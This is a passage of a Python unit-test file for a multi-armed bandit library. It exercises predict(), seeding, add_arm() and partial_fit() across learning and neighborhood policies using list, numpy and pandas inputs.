decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_series_reward_array(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=pd.Series([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=np.array([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_exp_decision_array_reward_series(self):
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3],
decisions=np.array([1, 1, 1, 2, 2, 2, 3, 3, 3]),
rewards=pd.Series([0, 0, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=False)
def test_context_history_series(self):
contexts = pd.DataFrame({'column1': [1, 2, 3], 'column2': [2, 3, 1]})
for lp in BaseTest.para_lps:
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1],
rewards=[0, 0, 0],
learning_policy=lp,
context_history=contexts['column1'],
contexts=[[1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.arm_to_model[0].beta.shape[0], 1)
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp) or isinstance(cp, NeighborhoodPolicy.TreeBandit):
continue
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1],
rewards=[0, 0, 0],
learning_policy=lp,
neighborhood_policy=cp,
context_history=contexts['column1'],
contexts=[[1]],
seed=123456,
num_run=1,
is_predict=True)
# Tree Bandit does not store contexts
if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
self.assertEqual(np.ndim(mab._imp.contexts), 2)
for cp in BaseTest.cps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1],
rewards=[0, 0, 0],
learning_policy=lp,
neighborhood_policy=cp,
context_history=contexts['column1'],
contexts=[[1]],
seed=123456,
num_run=1,
is_predict=True)
# Tree Bandit does not store contexts
if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
self.assertEqual(np.ndim(mab._imp.contexts), 2)
def test_context_series(self):
contexts = pd.DataFrame({'column1': [1, 2, 3, 3, 2, 1], 'column2': [2, 3, 1, 1, 2, 3]})
for lp in BaseTest.para_lps:
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1, 1, 1, 1],
rewards=[0, 0, 0, 0, 0, 0],
learning_policy=lp,
context_history=contexts['column1'],
contexts=pd.Series([1]),
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.arm_to_model[0].beta.shape[0], 1)
for cp in BaseTest.nps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1, 1, 1, 1],
rewards=[0, 0, 0, 0, 0, 0],
learning_policy=lp,
neighborhood_policy=cp,
context_history=contexts['column1'],
contexts=pd.Series([1]),
seed=123456,
num_run=1,
is_predict=True)
# Tree Bandit does not store contexts
if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
self.assertEqual(np.ndim(mab._imp.contexts), 2)
for cp in BaseTest.cps:
for lp in BaseTest.lps:
if not self.is_compatible(lp, cp):
continue
arm, mab = self.predict(arms=[0, 1],
decisions=[1, 1, 1, 1, 1, 1],
rewards=[0, 0, 0, 0, 0, 0],
learning_policy=lp,
neighborhood_policy=cp,
context_history=contexts['column1'],
contexts=pd.Series([1]),
seed=123456,
num_run=1,
is_predict=True)
# Tree Bandit does not store contexts
if not isinstance(cp, NeighborhoodPolicy.TreeBandit):
self.assertEqual(np.ndim(mab._imp.contexts), 2)
#################################################
# Test contextual predict() method
################################################
def test_context_arm_list_int(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_arm_list_str(self):
for lp in MABTest.para_lps:
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, -2, 2, 3, 11], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, -5, 2, 3, 10], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, -2, 4, 3, 9], [20, 19, 18, 17, 16], [1, 2, 1, 1, 3],
[17, 18, 17, 19, 18]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_reward_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_reward_series(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=pd.Series([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=pd.Series([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_array(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_reward_array(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=[1, 1, 1, 2, 2, 3, 3, 3, 3, 3],
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
def test_context_decision_reward_array(self):
for lp in MABTest.para_lps:
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
self.predict(arms=[1, 2, 3, 4],
decisions=np.array([1, 1, 1, 2, 2, 3, 3, 3, 3, 3]),
rewards=np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1]),
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
#################################################
# Test random generator
################################################
def test_seed(self):
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.25),
seed=123456,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [3, 3, 3, 3])
self.assertIs(mab._rng, mab._imp.rng)
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.25),
seed=7,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [2, 3, 3, 3])
self.assertIs(mab._rng, mab._imp.rng)
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.25),
seed=79,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [3, 3, 3, 2])
self.assertIs(mab._rng, mab._imp.rng)
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.33),
seed=123456,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [3, 3, 3, 3])
self.assertIs(mab._rng, mab._imp.rng)
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.33),
seed=7,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [2, 1, 1, 3])
self.assertIs(mab._rng, mab._imp.rng)
arms, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 2, 2, 2, 3, 3, 3],
rewards=[0, 0, 0, 0, 0, 0, 1, 1, 1],
learning_policy=LearningPolicy.EpsilonGreedy(epsilon=0.33),
seed=79,
num_run=4,
is_predict=True)
self.assertEqual(len(arms), 4)
self.assertEqual(arms, [3, 3, 3, 2])
self.assertIs(mab._rng, mab._imp.rng)
def test_set_rng(self):
for lp in MABTest.lps:
mab = MAB([0, 1], lp)
self.assertIs(mab._rng, mab._imp.rng)
for lp in MABTest.para_lps:
mab = MAB([0, 1], lp)
self.assertIs(mab._rng, mab._imp.rng)
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([0, 1], lp, cp)
self.assertIs(mab._rng, mab._imp.rng)
self.assertIs(mab._rng, mab._imp.lp.rng)
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([0, 1], lp, cp)
self.assertIs(mab._rng, mab._imp.rng)
self.assertIs(mab._rng, mab._imp.lp_list[0].rng)
#################################################
# Test add_arm() method
################################################
def test_add_arm(self):
for lp in MABTest.lps:
mab = MAB([0, 1], lp)
mab.add_arm(2)
self.assertTrue(2 in mab.arms)
self.assertTrue(len(mab._imp.arms) == 3)
self.assertTrue(2 in mab._imp.arm_to_expectation.keys())
mab.add_arm('a')
self.assertTrue('a' in mab.arms)
self.assertTrue(len(mab._imp.arms) == 4)
self.assertTrue('a' in mab._imp.arm_to_expectation.keys())
def test_add_arm_contextual(self):
for lp in MABTest.para_lps:
mab = MAB([0, 1], lp)
mab.add_arm(2)
self.assertTrue(2 in mab.arms)
self.assertTrue(len(mab._imp.arms) == 3)
self.assertTrue(2 in mab._imp.arm_to_expectation.keys())
mab.add_arm('a')
self.assertTrue('a' in mab.arms)
self.assertTrue(len(mab._imp.arms) == 4)
self.assertTrue('a' in mab._imp.arm_to_expectation.keys())
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([0, 1], lp, cp)
mab.add_arm(2)
self.assertTrue(2 in mab.arms)
self.assertTrue(len(mab._imp.arms) == 3)
self.assertTrue(len(mab._imp.lp.arms) == 3)
self.assertTrue(2 in mab._imp.lp.arm_to_expectation.keys())
mab.add_arm('a')
self.assertTrue('a' in mab.arms)
self.assertTrue(len(mab._imp.arms) == 4)
self.assertTrue(len(mab._imp.lp.arms) == 4)
self.assertTrue('a' in mab._imp.lp.arm_to_expectation.keys())
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
mab = MAB([0, 1], lp, cp)
mab.add_arm(2)
self.assertTrue(2 in mab.arms)
self.assertTrue(len(mab._imp.arms) == 3)
self.assertTrue(len(mab._imp.lp_list[0].arms) == 3)
self.assertTrue(2 in mab._imp.lp_list[0].arm_to_expectation.keys())
mab.add_arm('a')
self.assertTrue('a' in mab.arms)
self.assertTrue(len(mab._imp.arms) == 4)
self.assertTrue(len(mab._imp.lp_list[0].arms) == 4)
self.assertTrue('a' in mab._imp.lp_list[0].arm_to_expectation.keys())
#################################################
# Test partial_fit() method
################################################
def test_partial_fit(self):
for lp in MABTest.lps:
arm, mab = self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
seed=123456,
num_run=1,
is_predict=True)
mab.partial_fit(["A", "B"], [0, 0])
def test_partial_fit_contextual(self):
for lp in MABTest.para_lps:
arm, mab = self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
mab.partial_fit(["A", "B"], [0, 0], [[1, 3, 1, 1, 1], [0, 0, 0, 0, 0]])
for cp in MABTest.nps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
arm, mab = self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
rewards=[0, 1, 1, 0, 0, 0, 0, 1, 1, 1],
learning_policy=lp,
neighborhood_policy=cp,
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
mab.partial_fit(["A", "B"], [0, 0], [[1, 3, 1, 1, 1], [0, 0, 0, 0, 0]])
for cp in MABTest.cps:
for lp in MABTest.lps:
if not self.is_compatible(lp, cp):
continue
arm, mab = self.predict(arms=["A", "B", "C", "D"],
decisions=["A", "A", "A", "B", "B", "C", "C", "C", "C", "C"],
